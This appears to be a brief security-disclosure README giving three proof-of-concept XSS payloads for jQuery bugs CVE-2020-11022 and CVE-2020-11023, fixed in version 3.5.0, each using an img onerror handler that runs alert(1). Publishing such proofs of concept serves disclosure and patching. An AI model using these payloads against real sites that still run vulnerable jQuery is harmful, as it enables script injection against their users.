jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)

PoCs of XSS bugs fixed in jQuery 3.5.0. You can find the details in my blog post: English / 日本語

PoC 1

<style><style /><img src=x onerror=alert(1)>

PoC 2 (Only jQuery 3.x affected)

<img alt="<x" title="/><img src=x onerror=alert(1)>">

PoC 3

<option><style></option></select><img src=x onerror=alert(1)></style>